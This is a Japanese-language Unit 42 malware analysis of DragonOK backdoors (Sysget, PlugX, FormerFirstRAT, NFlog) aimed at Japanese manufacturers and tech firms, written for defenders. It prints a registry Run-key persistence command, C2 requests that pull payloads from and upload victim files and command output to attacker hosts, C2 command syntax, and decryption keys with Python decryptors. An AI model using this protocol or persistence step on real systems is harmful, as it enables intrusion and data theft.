[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Unit 42、日本を対象に開発されたDragonOKバックドアマルウェアの新種を発見

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Jen Miller-Osborn](https://unit42.paloaltonetworks.com/ja/author/jen-miller-osborn/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2015年4月14日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [DragonOK](https://unit42.paloaltonetworks.com/ja/tag/dragonok-ja/)
  * [FormerFirstRAT](https://unit42.paloaltonetworks.com/ja/tag/formerfirstrat-ja/)
  * [HelloBridge](https://unit42.paloaltonetworks.com/ja/tag/hellobridge-ja/)
  * [Japan](https://unit42.paloaltonetworks.com/ja/tag/japan-ja/)
  * [NewCT](https://unit42.paloaltonetworks.com/ja/tag/newct-ja/)
  * [NFlog](https://unit42.paloaltonetworks.com/ja/tag/nflog-ja/)
  * [PlugX](https://unit42.paloaltonetworks.com/ja/tag/plugx-ja/)
  * [PoisonIvy](https://unit42.paloaltonetworks.com/ja/tag/poisonivy-ja/)
  * [Sysget](https://unit42.paloaltonetworks.com/ja/tag/sysget-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/?pdf=download&lg=ja&_wpnonce=0070e94fe3 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/?pdf=print&lg=ja&_wpnonce=0070e94fe3 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Unit%2042、日本を対象に開発されたDragonOKバックドアマルウェアの新種を発見&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F&title=Unit%2042、日本を対象に開発されたDragonOKバックドアマルウェアの新種を発見 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F&text=Unit%2042、日本を対象に開発されたDragonOKバックドアマルウェアの新種を発見 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Unit%2042、日本を対象に開発されたDragonOKバックドアマルウェアの新種を発見%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets%2F "Share in Mastodon")

### **概要**

米Palo Alto Networksの調査チームUnit 42は、[AutoFocus](https://www.paloaltonetworks.jp/company/press/2015/2015-0401-palo-alto-networks-unveils-autofocus-cyber-threat-intelligence-service.html)脅威インテリジェンスサービスを使用し、日本の組織に対する一連の標的型攻撃を調査しました。

AutoFocusを使い、WildFireやその他のPalo Alto Networksが共有する脅威情報をすばやく検索し、生成した情報を相関分析すると、公に「DragonOK」(※1)  
として知られるグループとある攻撃を結び付けることができました。これら攻撃は2015年1月から3月の間に発生していました。

DragonOKはこれまで日本のハイテク業と製造業を狙っていました。今回われわれは彼らの開発者が開発した "FormerFirstRAT" と呼ばれる新種のバックドアツール  
（使用者が知らないうちに通信を行う悪意あるプログラム）を検出しました。今回の永続型攻撃で用いられた3つのRATおよび2つのバックドアツールに関する  
分析結果は "マルウェアの詳細" 項目を参照してください。

**攻撃の詳細**

今回の組織的攻撃では、HelloBridgeと呼ばれるSysgetマルウェアの異なる亜種をそれぞれ配信する5つの標的型攻撃が実施されました。  
このマルウェアには、ファイルを開くようユーザーをだまそうとするファイルが添付されていました。この中には、他の種類のファイルとして表示するために  
実行ファイルのアイコンを変更するもの (図1) と、ユーザーに正規ファイルを開いたように見せかける「おとり文書」が含まれていました。
[![figure 1 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-1-dragon.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-1-dragon.png) 1: Sysgetマルウェアの添付で使われたアイコン

この攻撃で使用されたSysgetファイルはいずれもbiosnews\[.\]info にホストされる単一のコマンドアンドコントロール (C2) サーバー（指揮統制サーバー）と通信します。  
SysgetはHTTPプロトコルを使用してこのサーバーと通信します。コマンドアンドコントロール通信の仕様については「マルウェアの詳細」項を参照してください。  
5つのすべての標的型攻撃は2ヶ月かけて日本のある製造業を対象としましたが、最後の攻撃では別の日本のハイテク組織が標的とされました (図2)。
[![figure 2 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-2-dragon-1024x761.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-2-dragon.png) 2: 2つの日本組織を標的として使用された5つのSysget サンプル

5つのSysget亜種のうち4つは、マルウェアではない正規ファイルを開いたように見せかけてユーザーをだます「おとり文書」を含んでいました。  
2つの実行ファイルは訃報を装うおとり文書を使用していました。図3に女性の訃報を含むGIFファイル、図4に男性の訃報を含むMicrosoft Wordドキュメントを示します。
[![figure 3 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-3-dragon.gif)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-3-dragon.gif) 3: 女性の訃報を含む日本語のおとり文書(GIFファイル形式) [![figure 4 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-4-dragon-300x195.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-4-dragon.png) 4 男性の訃報を含むMicrosoft Word形式の日本語おとり文書

PDFアイコンで示されるSysgetサンプルではAdobe.exeという名前の第二段階の実行ファイルを生成し、以下の警告を表示します。
[![figure 5 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-5-dragon.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-5-dragon.png) 5: Adobe.exeにより生成されるエラーメッセージ\*\*「このアプリケーション用のアプリケーション記述子が見つかりませんでした。再インストールを試みるか、詳細を発行者に問い合わせてください」\*\*

最後のSysgetサンプルはMicrosoft Excelアイコンを使用しており、図6のようにセルに "XXXXXX" と記述されたExcel文書を開きます。
[![figure 6 - dragon](http://blog.paloaltonetworks.com/wp-content/uploads/2015/04/figure-6-dragon-500x685.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-6-dragon.png) 6: 複数の行と列にXが記載されたExcelシート

これらSysget亜種は今回の攻撃で第一段階のデータと考えられます。この脅威の分析において、われわれはbiosnews\[.\]info にホストされている  
5つの別のバックドアツールを特定しました。このツールは攻撃者が足掛かりを築いた後にSysget亜種によってダウンロードされるものと考えられます。

NFlog、PoisonIvy、NewCTという3つのバックドアは既にDragonOKと公に関連付けられています。さらに攻撃者はツールキットに有名なPlugXという  
バックドアを追加しました。もう一つ追加されたバックドアは、これまでわれわれがDragonOKやその他の攻撃グループと関連付けていない新しい  
カスタマイズされたツールとみられます。開発者がツールを参照するために使用していたと思われる名前に沿って、われわれはこのツールを"FormerFirstRAT" と  
名付けました。図7に、これらバックドアとそれぞれのコマンドアンドコントロール サーバーとの関係を示します。
[![figure 7 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-7-dragon-937x1024.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-7-dragon.png) 7: 今回の攻撃においてDragonOKによって使用された5つの追加バックドア（馬マークとこぶしマーク）とそのコマンドアンドコントロールサーバーとの関係

次項では、今回の攻撃で使用されたマルウェアの機能について詳しく説明します。

### マルウェアの詳細

**Sysget** **とHelloBridge**

今回の攻撃ではメールにSysgetサンプルが添付され、ユーザーをだましてシステムへ感染するようにさせるため、さまざまなアイコンが使用されました。  
これらサンプルの大半は、正規ファイルと悪意あるダウンローダーを含む自己解凍型の実行ファイルです。自己解凍型の実行ファイルを起動すると、  
ダウンローダーと正規ファイルは次のどちらかのディレクトリに置かれ、その後実行されます。

* %PROGRAMFILES%
* %WINDIR%\\Temp

悪意あるダウンローダーが実行されると、まず一つのインスタンスを確実に実行するために "mcsong\[\]" イベントを生成します。  
その後 "Chrome-Update" というウィンドウ名を持つ "C:\\\\windows\\\\system32\\\\cmd.exe" という新しいインスタンスを生成します。  
FindWindowW APIコールを使用してウィンドウハンドルの取得を試み、実行ファイルに以下のコマンドを送信します。  
これにより、マルウェアはcmd.exeプロセス内でコマンドを間接的に実行できるようになります。  
reg add hkcu\\software\\microsoft\\windows\\currentversion\\run /v netshare /f /d %temp%\\notilv.exe /t REG\_EXPAND\_SZ

|---|-----------------------------------------------------------------------------------------------------------------------|
| 1 | reg add hkcu\\software\\microsoft\\windows\\currentversion\\run /v netshare /f /d %temp%\\notilv.exe /t REG\_EXPAND\_SZ |

このレジストリキーにより、後でダウンロードされる実行ファイルがリブート後に動作するよう設定されます。  
そしてその実行ファイルに "exit" コマンドを送信し、このプロセスを強制終了します。

マルウェアはその後以下のファイルを読み込もうとします。このファイルはネットワーク通信時に受信したデータの復号化に使用する鍵を保存するために用いられます。  
%temp%\\ibmCon6.tmp

|---|---------------------|
| 1 | %temp%\\ibmCon6.tmp |

ファイルが存在しない場合、次のGETリクエストを実施します。  
GET /index.php?fn=s4\&name=4890c2d546fa48a536b75b48b17de023 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive

|-------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | GET /index.php?fn=s4\&name=4890c2d546fa48a536b75b48b17de023 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive |

ファイル名 (fn) と名前 (name) の各パラメータは上記リクエスト内で静的に設定されます。サーバーは以下のデータで応答します。  
HTTP/1.1 200 OK Date: Wed, 11 Mar 2015 00:14:14 GMT Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod\_bwlimited/1.4 mod\_fcgid/2.3.10-dev X-Powered-By: PHP/5.4.37 Keep-Alive: timeout=5 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 17 gh204503254 1916733707 0

|-------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | HTTP/1.1 200 OK Date: Wed, 11 Mar 2015 00:14:14 GMT Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod\_bwlimited/1.4 mod\_fcgid/2.3.10-dev X-Powered-By: PHP/5.4.37 Keep-Alive: timeout=5 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 17 gh204503254 1916733707 0 |

応答した最初の2つのデータ ("17" と "gh204503254") はその後、前述のibmCon6.tmpファイルに書き込まれます。  
マルウェアは "notilv.exe" という実行ファイル名で %TEMP% ディレクトリに自身をコピーします。先ほど書き込んだレジストリキーにより、パソコンを  
再起動してユーザーがログインしたときにこのファイルが実行されます。  
次にマルウェアは以下のリクエストを行います。  
GET /index.php?fn=s1\&uid=fc1a8359e0f4cb8d60920dc066b8b21c HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive

|-------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | GET /index.php?fn=s1\&uid=fc1a8359e0f4cb8d60920dc066b8b21c HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive |

ファイル名 (fn) とuidの各パラメータは上記リクエスト内で静的に設定されます。レスポンスデータはRC4ストリーム暗号を使って復号化されます。  
先にダウンロードした "gh204503254" というデータは暗号鍵として使用されます。以下のPythonコードは "gh204503254" という暗号鍵を使った復号化に利用できます。  
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt CALG\_RC4 = 0x6801 CALG\_MD5 = 0x8003 md5\_hasher = CryptCreateHash(CALG\_MD5) CryptHashData(md5\_hasher, 'gh204503254') rc4\_key = CryptDeriveKey(md5\_hasher, CALG\_RC4) decrypted\_data = CryptDecrypt(rc4\_key, final\_data) pp.pprint(decrypted\_data)

|-------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt CALG\_RC4 = 0x6801 CALG\_MD5 = 0x8003 md5\_hasher = CryptCreateHash(CALG\_MD5) CryptHashData(md5\_hasher, 'gh204503254') rc4\_key = CryptDeriveKey(md5\_hasher, CALG\_RC4) decrypted\_data = CryptDecrypt(rc4\_key, final\_data) pp.pprint(decrypted\_data) |

この段階では、リモートサーバーは多くの異なるレスポンスを送信することができます。以下のレスポンスは、マルウェアにリモートの実行ファイルをダウンロードさせるよう指示します。  
sys getinto "filename.exe" "01234567890123456789012345678901";\\n

|---|-------------------------------------------------------------------|
| 1 | sys getinto "filename.exe" "01234567890123456789012345678901";\\n |

"filename.exe" はダウンロードされたファイルが保存されるパスで、 "01234567890123456789012345678901" は後続のHTTPリクエストで指定される値です。  
このコマンドを受信した場合、以下のリクエストが生成されます。  
GET /index.php?fn=s3\&file=01234567890123456789012345678901 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive

|-------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | GET /index.php?fn=s3\&file=01234567890123456789012345678901 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Connection: Keep-Alive |

このとき、リモートサーバーは、マルウェアがシステムに保存する暗号化されていないファイルで応答します。  
リモートサーバーは下記の例のようなレスポンスも送信できます。このレスポンスにより、指定されたファイルをアップロードするようマルウェアが指示します。  
sys upto "filename.exe";\\n

|---|-----------------------------|
| 1 | sys upto "filename.exe";\\n |

アップロードリクエストの例を以下に示します。  
POST /index.php?fn=s2\&item=70efdf2ec9b086079795c442636b55fb HTTP/1.1 Accept: text/html, application/xhtml+xml, \*/\* Content-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Content-Length: 115126 Connection: Keep-Alive -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="file"; filename="calc\_malware.exe" Content-Type: application/octet-stream \[BINARY\_DATA\] -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="path" 70efdf2ec9b086079795c442636b55fb -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="submit" Submit -----------------------------d5340oqbasdfaa--

|----------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | POST /index.php?fn=s2\&item=70efdf2ec9b086079795c442636b55fb HTTP/1.1 Accept: text/html, application/xhtml+xml, \*/\* Content-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Content-Length: 115126 Connection: Keep-Alive -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="file"; filename="calc\_malware.exe" Content-Type: application/octet-stream \[BINARY\_DATA\] -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="path" 70efdf2ec9b086079795c442636b55fb -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="submit" Submit -----------------------------d5340oqbasdfaa-- |

リモートサーバーは以下のようなレスポンスを送信することもできます。このレスポンスはマルウェアに指定されたコマンドを実行するよう指示します。  
\[command\];\\n

|---|-----------------|
| 1 | \[command\];\\n |

この実行結果は %TEMP% ディレクトリ内の一時的なテキストファイルに保存されます。実行結果は前述したものと同じ技術を使って暗号化されます。この結果のアップロード例を以下に示します。  
POST /index.php?fn=s2 HTTP/1.1 Accept: text/html, application/xhtml+xml, \*/\* Content-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Content-Length: 1609 Connection: Keep-Alive -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="file"; filename="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\.txt" Content-Type: application/octet-stream \[BINARY\_DATA\] -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="path" 70efdf2ec9b086079795c442636b55fb -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="submit" Submit -----------------------------d5340oqbasdfaa---

|-------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | POST /index.php?fn=s2 HTTP/1.1 Accept: text/html, application/xhtml+xml, \*/\* Content-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: biosnews\[.\]info Content-Length: 1609 Connection: Keep-Alive -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="file"; filename="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\.txt" Content-Type: application/octet-stream \[BINARY\_DATA\] -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="path" 70efdf2ec9b086079795c442636b55fb -----------------------------d5340oqbasdfaa Content-Disposition: form-data; name="submit" Submit -----------------------------d5340oqbasdfaa--- |

**PlugX**

PlugXは標的型攻撃で多く使用されるバックドアです。今回使用されたPlugXはシマンテック社の製品になりすまそうとします。以下のアイコンがサンプル内に存在します。
[![figure 8 - dragon](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-8-dragon.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/04/figure-8-dragon.png) 8 シマンテック社のロゴアイコンを使用するPlugX ファイル

マルウェアが実行されると、以下のパラメータを持つサービスとしてインストールされます。

|--------------------------|----------------------------|
| **Service Name**         | RasTls                     |
| **Service Display Name** | RasTls                     |
| **Service Description**  | Symantec 802.1x Supplicant |

また動作を持続させるため以下のレジストリキーを設定することもあります。  
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RasTls - %windir%\\system32\\svchost.exe

|---|---------------------------------------------------------------------------------------------------|
| 1 | HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RasTls - %windir%\\system32\\svchost.exe |

PlugXは標的型攻撃で長く使用されてきた背景もあり、よく研究されているマルウェアです。その歴史の詳細については以下のリンクを参照してください。

* [https://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx-kaba.html](https://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx-kaba.html)
* [http://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf](https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf)
* [https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf](https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf)

## FormerFirstRAT

このリモート管理ツール (RAT) は作者によって "FormerFirstRAT" と呼ばれています。FormerFirstRATは本来暗号化されたHTTPSが使われるはずのポート443上で非暗号化HTTPを使って通信します。ポート番号と通信プロトコルを不適当に組み合わせて使うことは、標的型攻撃において珍しいことではありません。  
またポート番号とプロトコルが一致しない通信は、悪意ある活動の痕跡となります。  
このマルウェアは起動時に持続性を確保するため、以下のレジストリキーを書き込みます。  
\[HKCU|HKLM\]\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\WmdmPmSp -\> EXE of DLL

|---|--------------------------------------------------------------------------------------------------------|
| 1 | \[HKCU|HKLM\]\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\WmdmPmSp -\> EXE of DLL |

マルウェアはその後、被害者のシステムに関する情報をHTTP POSTリクエストで送信します。このとき以下の情報が収集されます。

* 被害者の IP アドレス
* ユーザー名
* 管理者権限
* RAT ステータス (アクティブかスリープいずれか)
* RAT バージョン (今回のケースでは 0.8)
* Microsoft Windows バージョン
* UserID (ボリュームシリアル番号に続けてアンダースコアと "1" の連続)
* 言語設定

コマンド アンド コントロールには以下のパラメータが使用されます。  
Hostname: https.reweblink.com Port: 443 Timer: 180000 Method: POST

|---------|--------------------------------------------------------------------|
| 1 2 3 4 | Hostname: https.reweblink.com Port: 443 Timer: 180000 Method: POST |

このマルウェアはAES-128暗号を使用してネットワーク通信を暗号化します。暗号鍵を生成するために "tucwatkins" という文字列のMD5（関数の一種）を使用します。すべてのデータはHTTP POSTリクエストで送信されます。独特なTTP (Tactics, Techniques and Procedures; 戦術、技術、手順) ではないためこのマルウェアの作者はホームドラマのファンかもしれません。以下のコードはPythonを使用してマルウェア通信を復号する方法を示したものです。  
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt CALG\_AES\_128 = 0x660e CALG\_MD5 = 0x8003 data = "..." # Encrypted Data md5\_hasher = CryptCreateHash(CALG\_MD5) CryptHashData(md5\_hasher, 'tucwatkins') aes\_key = CryptDeriveKey(md5\_hasher, CALG\_AES\_128) decrypted\_data = CryptDecrypt(aes\_key, data)

|----------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 | from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt CALG\_AES\_128 = 0x660e CALG\_MD5 = 0x8003 data = "..." # Encrypted Data md5\_hasher = CryptCreateHash(CALG\_MD5) CryptHashData(md5\_hasher, 'tucwatkins') aes\_key = CryptDeriveKey(md5\_hasher, CALG\_AES\_128) decrypted\_data = CryptDecrypt(aes\_key, data) |

次にマルウェアはリモートサーバーへ定期的にリクエストを送信するループに入ります。リモートサーバーはRATに応答して指示を与えることができます。  
われわれは以下の機能を特定しました。

* リクエスト間のスリープタイマーを変更
* コマンド実行とコマンド出力のリターン
* ファイルシステムの閲覧
* ファイルのダウンロード
* ファイルの削除
* 被害者の情報搾取

HTTP POSTリクエストの例を以下に示します。  
POST / HTTP/1.1 Accept: \*/\* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: https.reweblink.com:443 Content-Length: 48 Cache-Control: no-cache \[encrypted binary data\]

|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 | POST / HTTP/1.1 Accept: \*/\* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: https.reweblink.com:443 Content-Length: 48 Cache-Control: no-cache \[encrypted binary data\] |

**NFlog**

実行中のプロセスに読み込まれるとNFlogはまず新規スレッドを生成します。この新規スレッドはDLLによって生成されたすべての悪意ある活動を担当します。最初にマルウェアは以下のレジストリキーを設定します。  
HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\update : \[current\_executable\_filename\]

|---|---------------------------------------------------------------------------------------------------------------|
| 1 | HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\update : \[current\_executable\_filename\] |

ここで \[current\_executable\_filename\] は実行中の実行ファイルのパスで、GetModuleFileNameAのプログラムを呼び出すことで取得されます。  
このレジストリキーは現在のユーザーがログインしているときに再起動した後もマルウェアが持続できるようにします。

このマルウェアサンプルには複数の文字列難読化ルーチンが含まれています。バイナリに含まれる文字列は、0x25という1バイトの鍵でバイナリを単純に排他的論理和 (XOR、２つの命題のうち片方のみが真となる論理演算) することで復号化されます。

次にマルウェアは "GoogleZCM" という名前付きイベントオブジェクトを生成しますが、このイベントはマルウェアのインスタンスが同時に一つだけ実行されるようにするために使われます。次にマルウェアは "GoogleZCM" という名前付きイベントオブジェクトを生成しますが、このイベントはマルウェアのインスタンスが同時に一つだけ実行されるようにするために使われます。

そしてマルウェアはローカルホスト上のポート1139への関連付けを試みます。

マルウェアはwww.microsoft.comへリクエストを送ることでインターネット接続の確認を行います。以下に例を示します。  
GET / HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: www.microsoft.com Cache-Control: no-cache Cookie: WT\_NVR=0=/:1=genuine:2=genuine/validate; MC1=GUID=aa8ac5ed26b9bf4f8d3bd1b2dcaa82f6\&HASH=edc5\&LV=201503\&V=4\&LU=1427378060061; A=I\&I=AxUFAAAAAADHBgAA8gS9lEdH+VwzUOqAM/3nlg!!\&V=4; WT\_FPC=id=bf26a610-0e65-413e-aef7-fd8c6b7df7c3:lv=1427375812454:ss=1427375780673; optimizelySegments=%7B%222130980600%22%3A%22true%22%2C%222098371093%22%3A%22true%22%2C%22223040836%22%3A%22search%22%2C%22244338170%22%3A%22none%22%2C%22223033821%22%3A%22false%22%2C%22223082014%22%3A%22ie%22%7D; optimizelyEndUserId=oeu1427379528348r0.49006120319115387; MUID=07660815420F6D5B2DCC0F63434A6C60 %3

